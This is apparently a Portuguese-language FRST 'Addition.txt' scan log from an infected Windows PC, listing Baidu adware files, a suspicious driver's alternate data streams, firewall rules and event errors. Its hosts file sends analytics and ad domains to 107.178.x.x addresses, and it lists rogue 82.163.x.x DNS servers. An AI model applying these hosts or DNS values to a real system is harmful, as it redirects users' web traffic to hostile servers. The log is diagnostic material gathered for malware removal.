2016-01-28 00:01 - 2016-03-04 12:11 - 00581432 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdstatreport.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00116024 _____ () C:\Program Files (x86)\baidu\Baidu Browser\SparkSafe.dll
2015-11-16 16:58 - 2016-01-28 00:01 - 00085816 _____ () C:\Users\David\AppData\Roaming\baidu\Spark\sysdata\ExtApp\SnapImg\SnapImg.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 01281848 _____ () C:\Program Files (x86)\baidu\Baidu Browser\libglesv2.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00080696 _____ () C:\Program Files (x86)\baidu\Baidu Browser\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [346]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04671-befa-11e5-82f2-c89cdc4e54f7} [20]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04672-befa-11e5-82f2-c89cdc4e54f7} [27]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04673-befa-11e5-82f2-c89cdc4e54f7} [30]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04674-befa-11e5-82f2-c89cdc4e54f7} [31]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04675-befa-11e5-82f2-c89cdc4e54f7} [38]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04676-befa-11e5-82f2-c89cdc4e54f7} [41]
AlternateDataStreams: C:\Users\David\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\David\AppData\Roaming:NT2 [346]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BavSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BavSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdengine => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdwfp => ""="Driver"

==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2013-08-22 10:25 - 2016-04-02 01:47 - 00002016 ____A C:\WINDOWS\system32\Drivers\etc\hosts
107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net
107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-3348681765-1422920454-2627347377-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\David\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-3348681765-1422920454-2627347377-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\migue_000\AppData\Local\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 82.163.143.185 - 82.163.142.185
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

MSCONFIG\Services: BavSvc => 2
MSCONFIG\Services: BdSandboxSrv => 3
MSCONFIG\Services: BHipsSvc => 2
MSCONFIG\Services: Disc Soft Lite Bus Service => 3
MSCONFIG\Services: GfExperienceService => 2
MSCONFIG\Services: gupdate => 3
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 3
MSCONFIG\Services: PCFasterSvc_{PCFaster_5.1.0.0} => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: Stereo Service => 2
MSCONFIG\Services: SwitchBoard => 3
MSCONFIG\Services: SystemUsageReportSvc_WILLAMETTE => 2
MSCONFIG\Services: USER_ESRV_SVC_WILLAMETTE => 3
MSCONFIG\Services: VIAKaraokeService => 2

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{D27C03D3-289C-47D6-8411-6EDE81486000}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{59A97412-16A3-4719-A5B2-70F583CEDB82}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [UDP Query User{F1B191FB-7608-4D4A-88E8-E0934F970B2E}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [TCP Query User{2481B005-305C-4BCC-9160-FD52E78E1924}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [{A44D4BF0-41AC-4A1A-84E2-522E83D9A7FB}] => (Allow) C:\Users\David\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{EB2F29CE-24FF-4DCA-B168-585C7158B21A}] => (Allow) C:\Users\David\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{507ADB31-AA33-4014-9B5D-BC59DAFD4D5C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C639607B-7D1A-4B04-BF5A-A7ACF3447338}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{60689C5C-1C89-4252-B2F5-61880343736B}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [TCP Query User{9B2068DE-C987-4AB6-A558-372B98CFEF8F}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [{646A1259-4113-487D-B232-55A476C5EA33}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0100D2D3-DC6E-434D-A9C3-3D6497D6F4DE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{3DFF0F8F-2C09-40D1-B667-93D73B6ABB1A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{7E7D8750-F48E-4067-BD95-4A13B8EFE821}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EF59FD79-19D5-4DEF-A7A3-5EA74834DDCD}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{6417A087-F477-4068-8916-6E5FC90651F7}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [TCP Query User{05E3C563-0B2B-499C-AD93-AAD0FC70B781}C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe] => (Allow) C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe
FirewallRules: [UDP Query User{586F8E83-CFFD-4292-87B2-AE4FC1AA776D}C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe] => (Allow) C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe
FirewallRules: [{3E74A8FA-F417-40DE-A0DB-A2977122232B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead\WalkingDead101.exe
FirewallRules: [{CBF86D45-937F-4D04-97C6-7325314EAB44}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead\WalkingDead101.exe
FirewallRules: [{E2AA88E3-9930-40FF-9D62-2B327D0B3A58}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead Season Two\TheWalkingDead2.exe
FirewallRules: [{B48DCD78-A07E-44BA-8266-6D1EA014B0BA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead Season Two\TheWalkingDead2.exe
FirewallRules: [{14B1CC1C-A435-4338-9D96-4C61721FB53B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sprite Lamp Demo\SpriteLamp.exe
FirewallRules: [{616D928D-3323-4A5D-902E-A251A5B18CEE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sprite Lamp Demo\SpriteLamp.exe
FirewallRules: [TCP Query User{50798E6D-CCE0-4E39-8BD7-F1B198EE90F1}C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe] => (Allow) C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe
FirewallRules: [UDP Query User{5710BC3A-5F24-45C6-8DA0-32737ECD3C22}C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe] => (Allow) C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe
FirewallRules: [TCP Query User{36E02D62-D980-4A6B-B413-554BFE4B31E8}C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe
FirewallRules: [UDP Query User{C7EBC94A-C81E-452E-9860-FD115C086AE7}C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe
FirewallRules: [{0A55B275-0BDD-4780-A963-B9E33289A074}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe
FirewallRules: [{7BB87EB7-E48B-4977-8EEB-490414BBB628}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe
FirewallRules: [{12DA9826-6EC4-45F2-A612-0061A3073097}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{66195D5B-ADEA-4CC9-9A30-6167CA9A32C8}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [TCP Query User{94A77FE3-43FC-48F7-AA5C-5E1FAE33482F}C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe
FirewallRules: [UDP Query User{9385CF58-1734-4325-9D31-6A11EDF289B1}C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe
FirewallRules: [{2D23381E-C4D5-4CA1-8D86-7590B7FE26DA}] => (Allow) C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe
FirewallRules: [{14953AE4-2329-4371-939C-984742925E60}] => (Allow) C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe
FirewallRules: [{473C50F7-AFA9-483F-AC6F-72474C0420F0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\NARUTO SHIPPUDEN Ultimate Ninja STORM 4\NSUNS4.exe
FirewallRules: [{BA523636-B7BE-4951-88AE-E042C76B3AC3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\NARUTO SHIPPUDEN Ultimate Ninja STORM 4\NSUNS4.exe
FirewallRules: [TCP Query User{E899B347-2223-4136-97B9-DD119091CEE6}J:\games\firewatch\firewatch.exe] => (Allow) J:\games\firewatch\firewatch.exe
FirewallRules: [UDP Query User{A872111C-20F1-4B37-9665-1948724A9E95}J:\games\firewatch\firewatch.exe] => (Allow) J:\games\firewatch\firewatch.exe
FirewallRules: [{A98F420D-7B1D-4BED-B608-0F9522E36DA7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe
FirewallRules: [{135C1A59-7936-4A1D-844E-DA3CA51CB99B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe
FirewallRules: [{BE570899-144F-4BE0-B1AD-99FD888F9B20}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\L.A.Noire\LANLauncher.exe
FirewallRules: [{F4B32CB7-3EC7-4B8E-9AE1-56A462297EB2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\L.A.Noire\LANLauncher.exe
FirewallRules: [{F1D6EABC-8A3F-40B6-AEE7-03EC04336917}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{BCFCB3E3-5A56-4E61-948A-CE43B285EA7F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is 
Strange\Binaries\Win32\LifeIsStrange.exe FirewallRules: [{B083BF0A-761E-4A32-B3FF-3E7EB7E9139A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [TCP Query User{EBAFA411-DB5D-4C52-8F74-45188D45EEB4}C:\program files (x86)\valve\half-life\hl.exe] => (Allow) C:\program files (x86)\valve\half-life\hl.exe FirewallRules: [UDP Query User{98579AD4-3B40-440A-9A4B-4ECE57AADE73}C:\program files (x86)\valve\half-life\hl.exe] => (Allow) C:\program files (x86)\valve\half-life\hl.exe FirewallRules: [TCP Query User{B8CF5598-02D7-42FA-9560-BD7A7E06D31E}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe FirewallRules: [UDP Query User{F739A1D3-920F-4785-8D68-F7FF924FB542}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe ==================== Pontos de Restauração ========================= 26-03-2016 01:10:45 Installed PokerStrategy.com Equilab. 02-04-2016 13:08:24 Instalador de Módulos do Windows ==================== Dispositivos Apresentando Falhas No Gerenciador ============= ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (04/03/2016 03:00:12 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS) Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais. 
Error: (04/03/2016 03:00:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x3a7c
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:45:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 02:44:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x1318
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:30:01 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 02:29:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: backgroundTaskHost.exe, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d8f0
Nome do módulo com falha: twinapi.appcore.dll, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d2f5
Código de exceção: 0xc000027b
Deslocamento da falha: 0x000000000004b199
ID do processo com falha: 0x205c
Hora de início do aplicativo com falha: 0xbackgroundTaskHost.exe0
Caminho do aplicativo com falha: backgroundTaskHost.exe1
Caminho do módulo com falha: backgroundTaskHost.exe2
ID do Relatório: backgroundTaskHost.exe3
Nome completo do pacote com falha: backgroundTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: backgroundTaskHost.exe5

Error: (04/03/2016 02:29:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x17dc
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:15:03 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 02:15:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x3040
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:04:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: backgroundTaskHost.exe, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d8f0
Nome do módulo com falha: twinapi.appcore.dll, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d2f5
Código de exceção: 0xc000027b
Deslocamento da falha: 0x000000000004b199
ID do processo com falha: 0xfc8
Hora de início do aplicativo com falha: 0xbackgroundTaskHost.exe0
Caminho do aplicativo com falha: backgroundTaskHost.exe1
Caminho do módulo com falha: backgroundTaskHost.exe2
ID do Relatório: backgroundTaskHost.exe3
Nome completo do pacote com falha: backgroundTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: backgroundTaskHost.exe5

Erros de Sistema:
=============
Error: (04/03/2016 03:05:59 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:59 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: %%2

Error: (04/03/2016 03:05:59 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:59 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: %%2

Error: (04/03/2016 03:05:58 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: %%2

Error: (04/03/2016 03:05:54 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:54 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: %%2

Error: (04/03/2016 03:05:52 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:52 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: %%2

CodeIntegrity:
===================================
Date: 2016-04-02 15:18:44.601
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-23 20:34:53.017
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-15 13:04:06.957
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-14 16:53:36.391
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-12 16:55:44.128
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-06 19:38:42.693
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-04 20:00:50.712
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-12 04:28:03.140
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-11 01:49:19.447
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-09 00:20:31.534
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i3-2120 CPU @ 3.30GHz
Percentagem de memória em uso: 37%
RAM física total: 8168.9 MB
RAM física disponível: 5080.24 MB
Virtual Total: 9448.9 MB
Virtual disponível: 5965.22 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.44 GB) (Free:34.18 GB) NTFS ==>[drive com componentes de inicialização (obtido através de BCD)]
Drive j: () (Fixed) (Total:232.94 GB) (Free:145.37 GB) NTFS
Drive k: (Disco Local ) (Fixed) (Total:232.82 GB) (Free:150.88 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 625E625E)
Partition 1: (Active) - (Size=232.4 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: E820E04E)
Partition 1: (Not Active) - (Size=232.9 GB) - (Type=OF Extended)
Partition 2: (Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================